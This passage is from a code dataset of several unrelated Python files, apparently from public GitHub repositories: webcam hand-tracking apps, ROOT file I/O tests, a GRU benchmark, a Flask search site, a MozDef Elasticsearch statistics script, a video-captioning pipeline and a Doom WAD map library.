self.channel.start_consuming()\n","repo_name":"ijwfly/kreacher-automator-pi","sub_path":"exchange/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17371975341","text":"import numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nimport cv2\r\nimport streamlit.components.v1 as components\r\n#https://github.com/madhav727/medium/blob/master/finger_counting_video.py\r\n@st.cache()\r\ndef skinmask(img):\r\n hsvim = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n lower = np.array([0, 48, 80], dtype = \"uint8\")\r\n upper = np.array([20, 255, 255], dtype = \"uint8\")\r\n skinRegionHSV = cv2.inRange(hsvim, lower, upper)\r\n blurred = cv2.blur(skinRegionHSV, (2,2))\r\n ret, thresh = cv2.threshold(blurred,0,255,cv2.THRESH_BINARY)\r\n return thresh\r\n@st.cache()\r\ndef getcnthull(mask_img):\r\n contours, hierarchy = cv2.findContours(mask_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours = max(contours, key=lambda x: cv2.contourArea(x))\r\n hull = cv2.convexHull(contours)\r\n return contours, hull\r\n@st.cache()\r\ndef getdefects(contours):\r\n hull = cv2.convexHull(contours, returnPoints=False)\r\n defects = cv2.convexityDefects(contours, hull)\r\n return defects\r\nst.title(\"ASL Translation Data Mining Project FALL2020\")\r\n\r\nst.header(\"By: Hanna Bowman, Mark Dobres, Matt Zenner \")\r\n\r\nst.write()\r\n\r\n\r\ncomponents.iframe(\"https://docs.google.com/document/d/13GSd2RFZXFlBHFAm_6_8_XLbOHc8OB1JF41P7_0Z5go/edit?usp=sharing\", height=900 )\r\n\r\n\r\nst.subheader(\"Translation from live video to text: \")\r\n\r\n\r\n\r\nif st.button(\"Begin...\"):\r\n st.success(\"Press Q to exit camera\")\r\n cap = cv2.VideoCapture(0) # '0' for webcam\r\n while cap.isOpened():\r\n _, img = cap.read()\r\n try:\r\n mask_img = skinmask(img)\r\n contours, hull = getcnthull(mask_img)\r\n cv2.drawContours(img, [contours], -1, (255,255,0), 2)\r\n cv2.drawContours(img, [hull], -1, (0, 255, 255), 2)\r\n defects = getdefects(contours)\r\n if defects is not None:\r\n cnt = 0\r\n for i in range(defects.shape[0]): # calculate the angle\r\n s, e, f, d = defects[i][0]\r\n start = tuple(contours[s][0])\r\n end = tuple(contours[e][0])\r\n far = tuple(contours[f][0])\r\n a = np.sqrt((end[0] - start[0]) ** 2 + (end[1] - start[1]) ** 2)\r\n b = np.sqrt((far[0] - start[0]) ** 2 + (far[1] - start[1]) ** 2)\r\n c = np.sqrt((end[0] - far[0]) ** 2 + (end[1] - far[1]) ** 2)\r\n angle = np.arccos((b ** 2 + c ** 2 - a ** 2) / (2 * b * c)) # cosine theorem\r\n if angle <= np.pi / 2: # angle less than 90 degree, treat as fingers\r\n cnt += 1\r\n cv.circle(img, far, 4, [0, 0, 255], -1)\r\n if cnt > 0:\r\n cnt = cnt+1\r\n cv2.putText(img, str(cnt), (0, 50), cv.FONT_HERSHEY_SIMPLEX,1, (255, 0, 0) , 2, cv.LINE_AA)\r\n cv2.imshow(\"img\", img)\r\n except:\r\n pass\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n break\r\n","repo_name":"PrismShake/dm_project_bowman","sub_path":"appThree.py","file_name":"appThree.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"75423427976","text":"import numpy as np\nimport pytest\nfrom skvalidate.io import walk\nimport skvalidate.io as skio\n\n\n@pytest.mark.parametrize('input_file,names,types,unpack_fields', [\n (\n 'tests/samples/test_1.root',\n ['test;1.i', 'test;1.x', 'test;1.y', 'test;1.z', 'test;1.v', 
'test;1.string'],\n [np.int32, np.float32, np.float32, np.float32, np.float32, np.object_],\n False,\n ),\n (\n 'tests/samples/test_2.root',\n ['test;1.i', 'test;1.x', 'test;1.y', 'test;1.z', 'test;1.v', 'test;1.string'],\n [np.int32, np.float32, np.float32, np.float32, np.float32, np.object_],\n False,\n ),\n (\n 'tests/samples/test_3.root',\n ['test;1.i', 'test;1.x', 'test;1.y', 'test;1.z', 'test;1.v', 'test;1.a'],\n [np.int32, np.float32, np.float32, np.float32, np.float32, np.float32],\n False,\n ),\n (\n 'tests/samples/objects.root',\n [\n 'Events;1.MyEvent.TObject.fBits',\n 'Events;1.MyEvent.TObject.fUniqueID',\n 'Events;1.MyEvent.eventID',\n 'Events;1.MyEvent.ayes.end_ns',\n 'Events;1.MyEvent.ayes.start_ns',\n 'Events;1.MyEvent.bees.driftTime',\n 'Events;1.MyEvent.bees.xyPosition',\n 'Events;1.MyEvent.bees.xyzPosition',\n ],\n [\n np.uint32, np.uint32, np.uint32,\n np.float32, np.float32,\n np.float32,\n np.float64, np.float64,\n np.float64, np.float64, np.float64\n ],\n False,\n ),\n (\n 'tests/samples/objects.root',\n [\n 'Events;1.MyEvent.TObject.fBits',\n 'Events;1.MyEvent.TObject.fUniqueID',\n 'Events;1.MyEvent.eventID',\n 'Events;1.MyEvent.ayes.end_ns',\n 'Events;1.MyEvent.ayes.start_ns',\n 'Events;1.MyEvent.bees.driftTime',\n 'Events;1.MyEvent.bees.xyPosition.fX',\n 'Events;1.MyEvent.bees.xyPosition.fY',\n 'Events;1.MyEvent.bees.xyzPosition.fX',\n 'Events;1.MyEvent.bees.xyzPosition.fY',\n 'Events;1.MyEvent.bees.xyzPosition.fZ',\n ],\n [\n np.uint32, np.uint32, np.uint32,\n np.float32, np.float32,\n np.float32,\n np.float64, np.float64,\n np.float64, np.float64, np.float64\n ],\n True,\n ),\n (\n 'tests/samples/non_tree_objects.root',\n ['1Dhist;1', '2Dhist;1'],\n [np.int32, np.float32],\n False,\n ),\n])\ndef test_walk(input_file, names, types, unpack_fields):\n result = list(walk(input_file, unpack_fields))\n assert len(result) == len(names)\n\n for name, array in result:\n assert name in names\n if hasattr(array, 'dtype'):\n assert array.dtype == types[names.index(name)]\n\n\n@pytest.mark.parametrize('input_file,expected_len', [\n ('tests/samples/objects.root', 1000),\n ('tests/samples/test_1.root', 10000),\n ('tests/samples/test_3.root', 10000),\n])\ndef test_load_array(input_file, expected_len):\n file_keys = skio.recursive_keys(input_file)\n for array_name in file_keys:\n array = skio.load_array(input_file, array_name)\n assert array is not None\n assert len(array) == expected_len\n\n\ndef test_load_array_from_object():\n input_file = 'tests/samples/objects.root'\n array_names = [\n 'Events;1.MyEvent.bees.xyzPosition.fX',\n 'Events;1.MyEvent.bees.xyzPosition.fY',\n 'Events;1.MyEvent.bees.xyzPosition.fZ',\n ]\n for array_name in array_names:\n tokens = array_name.split('.')\n obj_path = '.'.join(tokens[:-1])\n var = tokens[-1]\n array = skio.load_array(input_file, array_name)\n array2 = skio.load_array(input_file, obj_path)\n assert array is not None\n assert len(array) == 1000\n assert np.all(array == array2[var])\n","repo_name":"FAST-HEP/scikit-validate","sub_path":"tests/io/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"73172793417","text":"from __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport argparse\r\nimport math\r\nimport time\r\nimport importlib\r\n\r\nimport pdb\r\nimport torch\r\nfrom torch import nn\r\n\r\nTIME_SCALES = {'s': 1, 'ms': 1000, 'us': 1000000}\r\n\r\nparser = 
argparse.ArgumentParser()\r\nparser.add_argument('example', choices=['py', 'cpp', 'cuda', 'torch_lib'])\r\nparser.add_argument('-b', '--batch-size', type=int, default=32)\r\nparser.add_argument('-f', '--features', type=int, default=650)\r\nparser.add_argument('-s', '--state-size', type=int, default=1300)\r\nparser.add_argument('-r', '--runs', type=int, default=100)\r\nparser.add_argument('--scale', choices=['s', 'ms', 'us'], default='us')\r\nparser.add_argument('-c', '--cuda', action='store_true')\r\nparser.add_argument('-d', '--double', action='store_true')\r\noptions = parser.parse_args()\r\n\r\nif options.example == 'py':\r\n from python.gru_baseline import GRUCell \r\nelif options.example == 'torch_lib':\r\n i = \"do nothing\"\r\nelif options.example == 'cpp':\r\n from cpp.gru import GRUCell\r\nelse:\r\n from cuda.gru import GRUCell\r\n options.cuda = True\r\n\r\ndevice = torch.device(\"cuda\") if options.cuda else torch.device(\"cpu\")\r\ndtype = torch.float64 if options.double else torch.float32\r\n\r\nkwargs_hidden = {'dtype': dtype,\r\n 'device': device,\r\n 'requires_grad': True}\r\n\r\nkwargs_input = {'dtype': dtype,\r\n 'device': device,\r\n 'requires_grad': False}\r\n\r\nX = torch.randn(options.batch_size, options.features, **kwargs_input)\r\nh = torch.randn(options.batch_size, options.state_size, **kwargs_hidden)\r\n\r\nif options.example == 'torch_lib':\r\n rnn = nn.GRUCell(options.features, options.state_size).to(device, dtype)\r\nelse:\r\n rnn = GRUCell(options.features, options.state_size).to(device, dtype)\r\n\r\n# Force CUDA initialization\r\nnew_h = rnn(X, h)\r\nnew_h.sum().backward()\r\n\r\nforward_min = math.inf\r\nforward_time = 0\r\nbackward_min = math.inf\r\nbackward_time = 0\r\n\r\nfor _ in range(options.runs):\r\n rnn.zero_grad()\r\n\r\n start = time.time()\r\n new_h = rnn(X, h)\r\n elapsed = time.time() - start\r\n forward_min = min(forward_min, elapsed)\r\n forward_time += elapsed\r\n\r\n start = time.time()\r\n new_h.sum().backward()\r\n elapsed = time.time() - start\r\n backward_min = min(backward_min, elapsed)\r\n backward_time += elapsed\r\n\r\nscale = TIME_SCALES[options.scale]\r\nforward_min *= scale\r\nbackward_min *= scale\r\nforward_average = forward_time / options.runs * scale\r\nbackward_average = backward_time / options.runs * scale\r\n\r\nprint('Forward: %.3f us, backward: %.3f us' % (forward_average, backward_average))\r\n","repo_name":"kevinghst/GRU-CUDA","sub_path":"gru/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"45"} +{"seq_id":"3566752918","text":"from flask import Flask\nfrom flask import render_template # 渲染\nfrom flask import request\napp = Flask(__name__)\n\nimport search\n\n@app.route('/') # 主页地址,“装饰器”\ndef reviews():\n the_news = {\n 'XXX1': '1',\n 'XXX2': '2',\n 'XXX3': '3',\n 'XXX4': '4',\n }\n context = {\n 'title': 'Review Search Engine',\n 'the_news': the_news,\n }\n return render_template('index.html', context=context) #\n\n\n@app.route('/search_method', methods=['GET', 'POST'])\ndef search_method():\n keyword = request.form['keyword']\n label = search.get_predictions(keyword)\n result = search.search(keyword,label)\n\n the_news = result\n context = {\n 'title': 'Review Search Engine',\n 'the_reviews': the_news,\n }\n return render_template('index.html', context=context) #\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, port=80) 
#\n","repo_name":"Xanxus1111/IR_search_engine","sub_path":"searchWebsite.py","file_name":"searchWebsite.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71493632456","text":"import json\nimport logging\nimport os\nimport pyes\nimport pytz\nimport sys\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom configlib import getConfig, OptionParser\nfrom logging.handlers import SysLogHandler\nfrom dateutil.parser import parse\n\nlogger = logging.getLogger(sys.argv[0])\n\n\ndef loggerTimeStamp(self, record, datefmt=None):\n return toUTC(datetime.now()).isoformat()\n\n\ndef initLogger():\n logger.level = logging.INFO\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n formatter.formatTime = loggerTimeStamp\n if options.output == 'syslog':\n logger.addHandler(\n SysLogHandler(address=(options.sysloghostname,\n options.syslogport)))\n else:\n sh = logging.StreamHandler(sys.stderr)\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n\n\ndef toUTC(suspectedDate, localTimeZone=None):\n '''make a UTC date out of almost anything'''\n utc = pytz.UTC\n objDate = None\n if localTimeZone is None:\n localTimeZone=options.defaulttimezone\n if type(suspectedDate) == str:\n objDate = parse(suspectedDate, fuzzy=True)\n elif type(suspectedDate) == datetime:\n objDate = suspectedDate\n\n if objDate.tzinfo is None:\n objDate = pytz.timezone(localTimeZone).localize(objDate)\n objDate = utc.normalize(objDate)\n else:\n objDate = utc.normalize(objDate)\n if objDate is not None:\n objDate = utc.normalize(objDate)\n\n return objDate\n\n\ndef esSearch(es, begindateUTC=None, enddateUTC=None):\n resultsList = list()\n if begindateUTC is None:\n begindateUTC = toUTC(datetime.now() - timedelta(minutes=options.aggregationminutes))\n if enddateUTC is None:\n enddateUTC = toUTC(datetime.now())\n try:\n # search for events within the date range that haven't already been alerted (i.e. 
given an alerttimestamp)\n qDate = pyes.RangeQuery(qrange=pyes.ESRange('utctimestamp', from_value=begindateUTC, to_value=enddateUTC))\n q = pyes.ConstantScoreQuery(pyes.MatchAllQuery())\n q = pyes.FilteredQuery(q,pyes.BoolFilter(must=[qDate]))\n \n q=q.search()\n \n qagg = pyes.aggs.TermsAgg(name='category', field='category')\n q.agg.add(qagg)\n results=es.search(query=q,indices=['events'])\n \n mozdefstats=dict(utctimestamp=toUTC(datetime.now()).isoformat())\n mozdefstats['summary']='Aggregated category counts'\n mozdefstats['processid']=os.getpid()\n mozdefstats['processname']=sys.argv[0]\n mozdefstats['details']=dict(counts=list())\n for bucket in results.aggs['category']['buckets']:\n entry=dict()\n entry[bucket['key']]=bucket['doc_count']\n mozdefstats['details']['counts'].append(entry)\n return mozdefstats\n\n except pyes.exceptions.NoServerAvailable:\n logger.error('Elastic Search server could not be reached, check network connectivity')\n\n\ndef main():\n '''\n Get aggregated statistics on incoming events\n to use in alerting/notices/queries about event patterns over time\n '''\n logger.debug('starting')\n logger.debug(options)\n es = pyes.ES(server=(list('{0}'.format(s) for s in options.esservers)))\n stats = esSearch(es)\n logger.debug(json.dumps(stats))\n try:\n # post to elastic search servers directly without going through\n # message queues in case there is an availability issue\n es.index(index='events',\n doc_type='mozdefstats',\n doc=json.dumps(stats),\n bulk=False)\n\n except Exception as e:\n logger.error(\"Exception %r when gathering statistics \" % e)\n\n logger.debug('finished')\n\n\ndef initConfig():\n # output our log to stdout or syslog\n options.output = getConfig('output', 'stdout', options.configfile)\n # syslog hostname\n options.sysloghostname = getConfig('sysloghostname',\n 'localhost',\n options.configfile)\n # syslog port\n options.syslogport = getConfig('syslogport', 514, options.configfile)\n\n\n # change this to your default zone for when it's not specified\n options.defaulttimezone = getConfig('defaulttimezone',\n 'UTC',\n options.configfile)\n\n # elastic search server settings\n options.esservers = list(getConfig('esservers',\n 'http://localhost:9200',\n options.configfile).split(','))\n \n # field to use as the aggegation point (category, _type, etc)\n options.aggregationfield = getConfig('aggregationfield',\n 'category',\n options.configfile)\n\n # default time period in minutes to look back in time for the aggregation\n options.aggregationminutes = getConfig('aggregationminutes',\n 15,\n options.configfile)\n\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option(\n \"-c\",\n dest='configfile',\n default=sys.argv[0].replace('.py', '.conf'),\n help=\"configuration file to use\")\n (options, args) = parser.parse_args()\n initConfig()\n initLogger()\n main()\n","repo_name":"Thang1102/MozDef_1v10","sub_path":"cron/eventStats.py","file_name":"eventStats.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1078298475","text":"# coding: utf-8\r\nfrom ShortDetect import get_key_frames\r\nfrom img2txt import *\r\nimport cv2\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom Word2VectTextRank import summarize\r\n\r\ndef video2txt(video_path, save_key_frame=False):\r\n '''\r\n @input: \r\n '''\r\n PATH = os.path.split(os.path.realpath(video_path))[0] + '/'\r\n \r\n # 生成关键帧\r\n key_frames, IMG_SIZE = 
get_key_frames(video_path)\r\n\r\n # 存储关键帧到硬盘\r\n # if save_key_frame:\r\n # print('\\n--saving key frames...')\r\n # key_frame_path = os.path.join(PATH + 'key_frames')\r\n # if not os.path.exists(key_frame_path):\r\n # os.makedirs(key_frame_path)\r\n # for i, frame in enumerate(key_frames):\r\n # kf_path = os.path.join(key_frame_path + '/' + str(i) + '.jpg')\r\n # if not os.path.exists(kf_path):\r\n # cv2.imwrite(kf_path, frame)\r\n # print('--{} saved.'.format(kf_path))\r\n\r\n # 模型加载\r\n opt = Config()\r\n opt.caption_data_path = './caption.pth'\r\n opt.model_ckpt = './caption_0914_1947'\r\n opt.use_gpu = False\r\n\r\n data = t.load(opt.caption_data_path)\r\n word2ix, ix2word = data['word2ix'], data['ix2word']\r\n\r\n IMG_NET_MEAN = [0.485, 0.456, 0.406]\r\n IMG_NET_STD = [0.229, 0.224, 0.225]\r\n\r\n normalize = tv.transforms.Normalize(mean=IMG_NET_MEAN, std=IMG_NET_STD)\r\n transforms = tv.transforms.Compose([\r\n tv.transforms.Resize(opt.scale_size),\r\n tv.transforms.CenterCrop(opt.img_size),\r\n tv.transforms.ToTensor(),\r\n normalize\r\n ])\r\n\r\n resnet50 = tv.models.resnet50(True).eval() # 用resnet50提取图像特征\r\n del resnet50.fc\r\n resnet50.fc = lambda x: x # 将全连接层替换为恒等映射\r\n resnet50.avgpool.stride = 7 # 修改average pool步长\r\n\r\n cap_model = CaptionModel(opt, word2ix, ix2word) # 加载图像描述模型\r\n cap_model = cap_model.load(opt.model_ckpt).eval()\r\n\r\n # 为每一帧image生成Caption\r\n tr4s = TextRank4Sentence()\r\n is_resize = True\r\n if max(IMG_SIZE) == 256:\r\n is_resize = False\r\n\r\n print('\\n--processing key frames...')\r\n txts = ''\r\n for frame in tqdm(key_frames):\r\n # 处理每帧图像\r\n frame = Image.fromarray(frame).convert('RGB') # 转换为3通道的格式(RGB)\r\n if is_resize:\r\n frame.resize(IMG_SIZE)\r\n img = transforms(frame).unsqueeze(0)\r\n txts += generate_txt(img, tr4s, resnet50, cap_model, opt.use_gpu)\r\n txts = ''.join(txts.split()) # 去空格\r\n print('all img_txts:\\n', txts) # 字符串数组\r\n\r\n # ----------------文本摘要(有很多算法,这里尝试两种算法,未尝试的算法如seq2seq)\r\n # 算法一: textRank\r\n tr4s.analyze(text=txts, lower=True, source='all_filters')\r\n summary = tr4s.get_key_sentences()[0].sentence + '。' \\\r\n + tr4s.get_key_sentences()[1].sentence + '。' \\\r\n + tr4s.get_key_sentences()[2].sentence + '。' \\\r\n # + tr4s.get_key_sentences()[3].sentence + '。' \\\r\n # + tr4s.get_key_sentences()[4].sentence + '。' # 取3个最重要的句子\r\n \r\n summary = ''.join(summary.split())\r\n print('video caption 1:\\n', summary)\r\n\r\n # 算法二: word2vect based textRank\r\n summary = summarize(txts, 2) # 排序后,取2个句子\r\n sum_2 = ''\r\n for sent in summary:\r\n sum_2 += sent\r\n print('video caption 2:\\n', sum_2)\r\n\r\n # 保存summary\r\n # print('--saving text...')\r\n # txts_path = os.path.join(PATH + 'summary.txt')\r\n # print('txts_path: ', txts_path)\r\n # with open(txts_path, \"w\", encoding='utf-8') as txt_file:\r\n # txt_file.write(txts)\r\n\r\n # if (len(key_frames) != 0):\r\n # cv2.imshow('key_frame example', key_frames[int(len(key_frames) * 0.5)])\r\n # cv2.waitKey()\r\n # else:\r\n # print('[error]: extract key frames failed.')\r\n # return\r\n\r\n\r\n# if __name__ == '__main__':\r\n# video2txt('./actor.mp4', True)\r\n# print('--Test done.')\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 2:\r\n print(\"Usage: python videoCaption.py input_file\")\r\n sys.exit()\r\n in_file = sys.argv[1]\r\n print('in_file: ', in_file)\r\n video2txt(in_file)\r\n print('--Video caption 
done.')\r\n","repo_name":"CaptainEven/VideoCaption","sub_path":"videoCaption.py","file_name":"videoCaption.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"45"} +{"seq_id":"7087459738","text":"import numpy as np\nimport time\nimport cv2\nfrom cvzone.HandTrackingModule import HandDetector\nimport pyglet\n\n\ncap =cv2.VideoCapture(0)\ncap.set(3,1280)\ncap.set(4,720)\n\nwindow = pyglet.window.Window()\ndetector =HandDetector(detectionCon=0.8)\n\nkeys=[[\"C\",\"D\",'E',\"F\",\"G\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"A\",\"B\"],[\"C#\",\"D#\",\"F#\",\"G#\",\"A#\",\"C#\",\"D#\",\"F#\",\"G#\",\"A#\"]]\n\nclass Button():\n def __init__(self,pos,text,size,color):\n self.pos=pos\n self.size=size\n self.text=text\n self.color=color\nbuttonList=[]\nfor i in range(len(keys)):\n for j,key in enumerate(keys[i]): \n if i==0:\n buttonList.append(Button([38*j+15,80],key,[35,100],(255,255,255)))\n else:\n buttonList.append(Button([(40+j)*j+25,80],key,[35,50],(0,0,0))) \n\ndef playkeys(button):\n if button.text==\"A\":\n \n effectA=pyglet.resource.media(\"A.wav\",streaming=False)\n effectA.play()\n \n \n elif button.text==\"B\":\n \n effectB=pyglet.resource.media(\"B.wav\",streaming=False)\n effectB.play()\n \n elif button.text==\"C\":\n \n effectC=pyglet.resource.media(\"C.wav\",streaming=False)\n effectC.play()\n elif button.text==\"D\":\n \n effectD=pyglet.resource.media(\"D.wav\",streaming=False)\n effectD.play()\n elif button.text==\"E\":\n \n effectE=pyglet.resource.media(\"E.wav\",streaming=False)\n effectE.play()\n \n\n elif button.text==\"F\":\n \n effectF=pyglet.resource.media(\"F.wav\",streaming=False)\n effectF.play()\n elif button.text==\"G\":\n \n effectG=pyglet.resource.media(\"G.wav\",streaming=False)\n effectG.play() \n\n\ndef drawAll(img,buttonList):\n for button in buttonList:\n x,y=button.pos\n w,h=button.size\n colorr=button.color\n cv2.rectangle(img,button.pos,(x+w,y+h),colorr,cv2.FILLED)\n cv2.putText(img,button.text,(x+10,y+h-10),cv2.FONT_HERSHEY_COMPLEX,0.5,(214,0,220),2)\n return img \n\nwhile True:\n success,img=cap.read()\n\n\n\n img= detector.findHands(img)\n lmlist,bboxInfo=detector.findPosition(img)\n img=drawAll(img,buttonList)\n if lmlist: #hand is there\n for button in buttonList:\n x,y=button.pos\n w,h=button.size\n \n for f in [4,8,12,16,20]:\n\n if x 0\n\n def clear_flag(s, flag):\n assert flag in Thing.FLAGBIT\n n = Thing.FLAGBIT[flag]\n s.options &= ~(1 << n)\n return s\n\n def set_all_difficulties(s):\n s.set_flag('Easy')\n s.set_flag('Medium')\n return s.set_flag('Hard')\n\nclass Vertex(SimpleStruct):\n FIELDS = [\n ('x', 'short'),\n ('y', 'short'),\n ]\n def get_fields(s): return Vertex.FIELDS\n\nclass Sector(SimpleStruct):\n\n FIELDS = [\n ('floor_height' , 'short') , \n ('ceil_height' , 'short') , \n ('floor_pic' , 'string8') , \n ('ceil_pic' , 'string8') , \n ('light_level' , 'short') , \n ('special_sector' , 'short') , \n ('tag' , 'short') , \n ]\n\n def get_fields(s): return Sector.FIELDS\n\n def has_all_textures(s):\n return len(s.floor_pic) > 1 and len(s.ceil_pic) > 1\n\nclass LineDef(SimpleStruct):\n\n FLAGBIT = {\n \"Impassible\" : 0,\n \"Block Monsters\" : 1,\n \"Two-sided\" : 2,\n \"Upper Unpegged\" : 3,\n \"Lower Unpegged\" : 4,\n \"Secret\" : 5,\n \"Block Sound\" : 6,\n \"Not on Map\" : 7,\n \"Already on Map\" : 8 }\n\n FIELDS = [\n ('vert0', 'short'),\n ('vert1', 'short'),\n ('flags', 'short'),\n ('function', 'short'),\n ('tag', 'short'),\n ('sd_right', 
'short'),\n ('sd_left', 'short'),\n ]\n\n def get_fields(s):\n return LineDef.FIELDS\n\n def set_flag(s, flag):\n assert flag in LineDef.FLAGBIT\n n = LineDef.FLAGBIT[flag]\n s.flags |= 1 << n\n return s\n\n def get_flag(s, flag):\n assert flag in LineDef.FLAGBIT\n n = LineDef.FLAGBIT[flag]\n return (s.flags & 1 << n) > 0\n\n def clear_flag(s, flag):\n assert flag in LineDef.FLAGBIT\n n = LineDef.FLAGBIT[flag]\n s.flags &= ~(1 << n)\n return s\n\n def flip_orientation(s):\n (s.vert0, s.vert1) = (s.vert1, s.vert0)\n (s.sd_right, s.sd_left) = (s.sd_left, s.sd_right)\n\nclass SideDef(SimpleStruct):\n\n FIELDS = [\n ('xofs', 'short'),\n ('yofs', 'short'),\n ('uppertex', 'string8'),\n ('lowertex', 'string8'),\n ('midtex', 'string8'),\n ('sector', 'short'),\n ]\n\n def get_fields(s): return SideDef.FIELDS\n\n def has_all_textures(s):\n return len(s.uppertex) > 1 and len(s.midtex) > 1 and len(s.lowertex)> 1\n\n def set_clear_textures(s):\n s.midtex = '-'\n s.uppertex = '-'\n s.lowertex = '-'\n\nclass DummyLump():\n \"\"\" Used for directory markers, like levels \"\"\"\n\n def __init__(s, name):\n s.name = name\n\n def get_name(s):\n return s.name\n\n def get_size(s):\n return 0\n\n def write(s, io): pass\n\ndef get_color_for_thing(thing_type):\n if thing_type not in THING_TABLE:\n print(f'WARNING: unknown thing type {thing_type}')\n return None\n type_desc = THING_TABLE[thing_type].lower()\n if 'player' in type_desc and 'start' in type_desc:\n return 'g'\n if 'key' in type_desc:\n if 'blue' in type_desc:\n return 'b'\n elif 'red' in type_desc:\n return 'r'\n elif 'yellow' in type_desc:\n return 'y'\n else:\n return None\n\ndef get_color_for_linedef(ld):\n if ld.function in (26, 32):\n return 'b'\n elif ld.function in (28, 33):\n return 'r'\n elif ld.function in (27, 34):\n return 'y'\n elif ld.get_flag('Two-sided'):\n return '0.8'\n else:\n return 'k'\n\nclass ArrayLump:\n\n def __init__(s, name, array):\n s.name = name\n s.array = array\n assert type(s.array) == list\n\n def write(s, io):\n io.write_array_lump(s.array)\n\n def get_size(s):\n if len(s.array) == 0:\n return 0\n else:\n return len(s.array) * s.array[0].get_size()\n\n def get_name(s):\n return s.name\n\nclass Map:\n\n def __init__(s, name):\n s.clear()\n s.name = name\n\n def __str__(s):\n return '%s: %d verts, %d sectors, %d sides, %d lines' % (s.name, len(s.verts), len(s.sectors), len(s.sidedefs), len(s.linedefs))\n\n def clear(s):\n s.name = None\n s.things = []\n s.verts = []\n s.linedefs = []\n s.sidedefs = []\n s.sectors = []\n\n def get_size(s):\n xx = [v.x for v in s.verts]\n yy = [v.y for v in s.verts]\n dx = max(xx) - min(xx)\n dy = max(yy) - min(yy)\n return (dx, dy)\n\n def plot(s):\n return s.plot(1.0)\n\n def plot_partial(s, height_over_width, linechance):\n linewidth = 1.0\n\n print('plotting %d things, %d lines' % (len(s.things), len(s.linedefs)))\n for t in s.things:\n color = get_color_for_thing(t.type)\n if color:\n pyplt.plot([t.x], [t.y], '.', color=color)\n\n color2lds = {}\n for ld in s.linedefs:\n color = get_color_for_linedef(ld)\n if not color in color2lds:\n color2lds[color] = []\n color2lds[color].append(ld)\n\n for (color, lds) in color2lds.items():\n xx = []\n yy = []\n nan = float('nan')\n for ld in lds:\n p0 = s.verts[ld.vert0]\n p1 = s.verts[ld.vert1]\n xx += [p0.x, p1.x, nan]\n yy += [p0.y, p1.y, nan]\n pyplt.plot( xx, yy, '-', color=color, linewidth=0.5)\n\n # make it square\n xx = [v.x for v in s.verts]\n yy = [v.y for v in s.verts]\n dx = max(xx) - min(xx)\n dy = max(yy) - min(yy)\n L = max(dx, 
dy) * 1.1\n cx = (max(xx)+min(xx))/2.0\n cy = (max(yy)+min(yy))/2.0\n left = cx - L/2.0/height_over_width\n right = cx + L/2.0/height_over_width\n top = cy + L/2.0\n bot = cy - L/2.0\n pyplt.xlim([ left, right ])\n pyplt.ylim([ bot, top ])\n\n print('done')\n\n def unique_textures(s):\n uniqs = set()\n for sd in s.sidedefs:\n uniqs.add(sd.uppertex)\n uniqs.add(sd.lowertex)\n uniqs.add(sd.midtex)\n return uniqs\n\n LUMP_TO_ELEMENT_CLASS = {\n 'THINGS' : Thing,\n 'VERTEXES' : Vertex,\n 'LINEDEFS' : LineDef,\n 'SIDEDEFS' : SideDef,\n 'SECTORS' : Sector,\n }\n\n def handle_lump(s, io, lump, lumpend):\n name = lump.name\n if name == 'THINGS':\n s.things += io.read_array_lump(lumpend, Thing)\n elif name == 'VERTEXES':\n s.verts += io.read_array_lump(lumpend, Vertex)\n elif name == 'LINEDEFS':\n s.linedefs += io.read_array_lump(lumpend, LineDef)\n elif name == 'SIDEDEFS':\n s.sidedefs += io.read_array_lump(lumpend, SideDef)\n elif name == 'SECTORS':\n s.sectors += io.read_array_lump(lumpend, Sector)\n else:\n return False\n return True\n\n def append_lumps_to(s, lumps):\n lumps += [\n DummyLump(s.name),\n ArrayLump('THINGS', s.things),\n ArrayLump('VERTEXES', s.verts),\n ArrayLump('LINEDEFS', s.linedefs),\n ArrayLump('SIDEDEFS', s.sidedefs),\n ArrayLump('SECTORS', s.sectors),\n ]\n\n def add_player_start(s, x, y, angle):\n t = Thing().fill([x, y, angle, 1, 0])\n s.things += [t]\n\n def sanity_asserts(s):\n print('checking %d verts for dupes' % len(s.verts))\n uniqverts = set()\n for v in s.verts:\n v2 = utils.Int2(v.x, v.y)\n uniqverts.add(v2)\n assert( len(uniqverts) == len(s.verts) )\n print('done')\n\n# check linedefs\n for ld in s.linedefs:\n assert ld.sd_right != None and ld.sd_right >= 0\n assert ld.sd_right != ld.sd_left\n\n for sd in s.sidedefs:\n assert sd.sector != None and sd.sector >= 0\n\nclass WADContent:\n \"\"\" Should contain all essential contents of a WAD \"\"\"\n\n def __init__(s):\n s.maps = []\n s.other_lumps = []\n s.end_msg = None\n\n def read_lumps( s, directory, wad ):\n mapp = None\n \n for entry in 